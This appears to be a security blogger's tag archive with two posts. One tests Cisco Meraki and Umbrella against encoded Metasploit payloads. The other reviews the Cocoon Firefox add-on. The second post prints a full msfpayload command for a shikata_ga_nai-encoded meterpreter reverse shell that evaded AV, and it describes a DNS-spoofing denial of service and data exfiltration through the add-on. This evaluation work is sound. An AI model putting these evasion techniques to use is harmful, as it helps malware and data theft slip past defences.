Tag Archives: TLS

Cisco Meraki security is kind of a joke…

Recently I wanted to test Meraki’s ‘Threat Protection’ system and see if it was really up to snuff. First, I setup an up to date Windows 10 virtual machine where I disabled the anti-virus on this system.  In this environment there isn’t any SSL inspection being done by Meraki and to my understanding, Cisco really doesn’t advocate using SSL inspection through Meraki. In my opinion, you are already at kind of a disadvantage with the lack of SSL inspection because most threats that need to be seriously considered will use encryption for evasion. Metasploit’s meterpreter payload has supported SSL and encryption for years. Plus you can setup legit certs for free if needed.

With that being said, I thought I would throw a softball at Meraki and see if it would do some sort of detection via HTTP. I tried downloading the benign eicar test file over HTTP and Meraki blocked it:

However, if you download the same file over HTTPS, Meraki does not block it (no surprise there).  I then decided to step my game up and generate a payload using msfvenom and host it on a python3 http server ( python3 -m http.server ):

I was able to download the payload using powershell on the victim VM:

I was then able to run the payload on the victim system and have a session:

Meraki did not detect the payload or the session.. and here’s the the virustotal report for this payload:

https://www.virustotal.com/gui/file/f7f301b9bb52a23efb1c6e5ee4f2bb6adeebda2882a60c9f98ca582100b78908/detection

This payload was not made in really any special way… it’s a pretty standard payload that I believe ALL IDS/IPS systems should be able to detect or block. However, I will give credit where credit is due. Later on I did receive an alert that this payload had slipped through:

Additionally, this Meraki configuration does not have Cisco’s Umbrella integrated yet. Would Umbrella have blocked it? I honestly don’t know but what I’m willing to test it.

I would like to add that a majority of events that I’ve seen under Security Center have been false positives. There is already enough noise in terms of information pertaining to networks. Meraki generating this just adds more unnecessary noise and can hamper investigations in my humble opinion.

I’m still thoroughly disappointed with this discovery because people are paying Cisco a lot of money for a false sense of security. Meraki should have blocked this threat right away. In the end of the day, I believe having well trained employees and thorough AV/EDR systems on endpoints is what matters most.

#Update 12/24/2021

I have setup the Umbrella client on the victim VM. Meraki blocked the known helpme.exe file, however if you simply use the shikata_ga_nai encoder to make a new file called helpme2.exe, this payload slipped through Meraki and Umbrella.

Here is the virustotal.com report for the file:

https://www.virustotal.com/gui/file/19cf577ac24452bfb715f421a6bdabadd0f2d043f60cbbf600e44e34dc14738f

I feel like I can confidentially say that Meraki/Umbrella security are a joke.

Firefox Add-On Cocoon – Its strengths and weaknesses

What is Cocoon? According to https://getcocoon.com/support/faq, it is:

Cocoon is a service that protects your computer and your privacy when you are on the Internet. It’s a virus-free, secure, and private web experience. We shield your computer from the bad guys, and we protect your identity from prying eyes. It’s that simple.

I would like to argue how ‘secure’ Cocoon is, but year after year, I think most information security specialists would agree that most things aren’t necessarily 100% secure. Semantics aside, I am still relatively impressed with this Firefox add-on, which can be obtained here.

Strengths of Cocoon:

Using tools like ettercap, sslstrip, webmitm, dnsspoof, and wireshark, I was not able to retrieve the login credentials that were used to sign on to Cocoon’s privacy service. The way they have implemented SSL with this plugin is probably one of the best SSL implementations I’ve seen in my humble opinion. (Although, it does use TLS version 1, which I think you should read about here.)

Even using webmitm and creating a self signed certificate pretty identical to the one that *.vworldc.com used, I was not able to log in to the service and I received this error message:

Cocoon Cert Error

The implementation of SSL that the Cocoon developers have used is simply wonderful. For people who are on the road and have to bear using public wifi on a regular basis and don’t have access to a VPN server or using a socks5 proxy server via SSH, I believe that using HTTPS Everywhere and Cocoon in tandem would be a great defense against attackers who are on the same network.

Weaknesses of Cocoon:

Cocoon’s proxy service has an AV solution implemented. For instance, when you go to download an executable file when you’re using Cocoon, you will be prompted that the file has either passed the virus scan or hasn’t. In the case of if it has passed the scan, you are still given a warning about what kind of file it is. If the file has failed the AV scan, you won’t be able to download the file while using Cocoon.

With that being said, I thought I would put Cocoon’s AV solution to the test. Firstly, I tried accessing a benign but universally known ‘virus’ file that triggers all AV solutions:

http://www.eicar.org/download/eicar.com

Not so surprisingly, this file was flagged and I was warned. My next test was to try a meterpreter PE hosted on my own website, which I created using:

msfpayload windows/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=443 R | msfencode -t exe -e x86/shikata_ga_nai -c 5 -o test.exe

(prior to running this string, I ran msfupdate of course). To my surprise, this file passed the AV scan done by Cocoon’s AV services. My next test was done using no encoders and yet again this passed the AV scan provided by Cocoon!

I even tried sbd.exe which is in the /pentest/windows-binaries/tools directory of BackTrack without modifying the file, yet it still passed Cocoon’s AV solution.

With Linux and OSX payloads from the Metasploit project, they passed the AV solution as well, but I was still warned that they were executable. Other file types that can trigger Cocoon’s AV solution are zip and tar.gz files. Yet .rar files triggered no alerts or prompts.

We shield your computer from the bad guys”, pertaining to AV solutions, this is where Cocoon falls extremely short.

Network attacks against Cocoon:

As of the moment, the only attack I could do against Cocoon was a DOS attack. I simply used dnsspoof or ettercap (and the dns_spoof plugin)  and setup a hosts file with *.vworldc.com pointing to my IP address or a non-existing one.

What this means is that someone who’s in the same network as me and if I know they use Cocoon, I could do a DOS attack against them so they cannot access Cocoon’s services and then they would be forced to access the web ‘naked’.

Offensive uses of Cocoon:

One could use Cocoon for ex-filtrating data out of an organization to a foreign entity. For instance, if I’m agitated employee X at employer Y, I could install and use Cocoon to e-mail an attachment containing company private information to an out of jurisdiction web server.

Closing Words:

For those of you who people come to for information security related solutions, I would highly recommend that you check this Firefox add-on. As of the moment, it is free and free to use their service. Weaknesses aside, I still believe that this is a great defensive tool.